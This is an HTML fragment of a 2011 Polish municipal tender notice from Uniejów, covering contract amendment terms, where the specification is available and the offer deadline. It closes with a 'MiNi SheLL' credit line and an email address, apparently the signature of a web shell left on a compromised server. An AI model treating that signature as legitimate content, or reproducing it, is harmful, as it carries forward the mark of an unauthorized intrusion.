<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie do umowy następujących zmian:
Zamawiający dopuszcza zmianę postanowień zawartej z wybranym wykonawcą umowy   w sytuacji gdy zaistnieje konieczność dopasowania terminów wykonania zamówienia określonych w par. 2 ust. 3 umowy w sytuacji wystąpienia siły wyższej, zdarzeń nieprzewidywalnych lub w sytuacji przesunięcia terminu z winy Zamawiającego (w tym przedłużających się procedur prawnych). 
Zamawiający dopuszcza możliwość zmiany ceny ryczałtowej, w sytuacji gdy urzędowo zostanie zmieniony podatek VAT.
Zamawiający dopuszcza zmianę postanowień zawartej z wybranym wykonawcą umowy w sytuacji gdy zaistnieje konieczność dopasowania terminów wykonania zamówienia określonych w par. 2 ust. 3 umowy w sytuacjach losowych lub spowodowanych siłą wyższą, 
Zamawiający zastrzega sobie prawo zawiesić wykonanie umowy w przypadku braku środków finansowych lub też w przypadku odstąpienia od realizacji całej lub części umowy. W takim przypadku Wykonawcy przysługuje wynagrodzenie za tylko za wykonaną część umowy. Zamawiający informuje pisemnie Wykonawcę o zawieszeniu wykonania całości lub części umowy, a następnie wprowadza zmiany do treści umowy.

W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uniejow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ EKONOMICZNO-ADMINISTRACYJNY OŚWIATY
W UNIEJOWIE

99-210 Uniejów, ul. Bł. Bogumiła 13,   tel.fax: (063) 288-94-92.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 08:55, miejsce: sekretariat Urzędu Miasta w Uniejowie, ul. Bł. Bogumiła 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com